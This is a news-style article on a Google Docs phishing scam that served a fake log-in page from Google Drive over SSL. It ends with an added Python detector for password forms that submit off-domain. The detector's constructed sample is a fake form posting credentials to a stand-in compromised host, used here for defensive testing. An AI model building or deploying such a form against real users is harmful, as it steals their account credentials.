There is a new, very tricky phishing scam taking advantage of Google Docs, and it has been working its way around the web. It uses a Google.com URL and even uses Google's SSL encryption, so it is very hard to tell that it is a hack.

It starts with an email. An email from a sender you don't know is usually the way all these hackings start, and this one is the same. It arrives in your inbox with the subject line “documents” and contains a link to a Google Docs page. The link shows up in the address bar and looks just like the real Google.com domain. However, it is taking you to a fake log-in page. This is how it starts, and how the hacker gets you.

In an article by Gizmodo, Symantec security expert Nick Johnson explained, “The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there, and then used Google Drive’s preview feature to get a publicly accessible URL to include in their messages.” This fake page is actually hosted on Google’s servers and is served over SSL, making the page even more convincing.

After logging in to your Google account through the fake page, you will actually be taken to a real Google doc. By then they have you: your information will be sent to a PHP script on a compromised server, and you won’t even know you have been hacked. To avoid this hacking situation, there are two things that will help. First, use some common sense when clicking on and opening emails that you are unsure of. If you receive an email from an unrecognized sender, don’t open it. Even an email from someone you do know, if it has the subject line “documents”, is probably not safe.

Second, if for some reason you do end up on the log-in screen, you should notice that it does not recognize you as a Google user. If you are in fact a Google user, that is likely a fake log-in page. If it seems strange that you need to log in again, it probably is. So beware of all these hacking scammers out there. Try not to fall for them in the first place and all should be well and good. These phishing scams are getting very sophisticated. Google has said that the problem is fixed, and a statement from their press team says:

“We’ve removed the fake pages and our abuse team is working to prevent this kind of spoofing from happening again. If you think you may have accidentally given out your account information, please reset your password.”
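The credential hand-off described earlier (a log-in page served from Google's domain that sends what you type to a PHP script on another server) can be checked for by looking at where a page's password form submits. The following is an added example, not code from the original article; the trusted-host list, the URLs and the HTML samples are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: hosts under these suffixes are the only legitimate sign-in targets.
TRUSTED_SUFFIXES = ("google.com",)

class LoginFormFinder(HTMLParser):
    """Collects the action of every <form> that contains a password field."""
    def __init__(self):
        super().__init__()
        self.action = None            # None while outside any <form>
        self.password_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.action = attrs.get("action") or ""   # empty action posts to the page itself
        elif (tag == "input" and self.action is not None
              and (attrs.get("type") or "").lower() == "password"):
            self.password_actions.append(self.action)

    def handle_endtag(self, tag):
        if tag == "form":
            self.action = None

def is_trusted(host):
    """Exact or subdomain match only, so google.com.evil.example does not pass."""
    host = (host or "").lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)

def suspicious_form_targets(page_url, html):
    """Return absolute targets of password forms that submit outside the trusted hosts."""
    finder = LoginFormFinder()
    finder.feed(html)
    targets = dict.fromkeys(urljoin(page_url, a) for a in finder.password_actions)
    return [t for t in targets if not is_trusted(urlparse(t).hostname)]

# Constructed samples: a page URL on Google's domain and two log-in forms.
PAGE = "https://docs.google.com/constructed-preview-page"
FAKE = ('<form action="http://compromised.example/save.php" method="post">'
        '<input type="text" name="Email"><input type="password" name="Passwd"></form>')
REAL = '<form action="/signin" method="post"><input type="password" name="Passwd"></form>'

if __name__ == "__main__":
    print(suspicious_form_targets(PAGE, FAKE))
    print(suspicious_form_targets(PAGE, REAL))
```

The check only reads static HTML, so a page that submits credentials from script would need to be observed in a browser or proxy instead.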
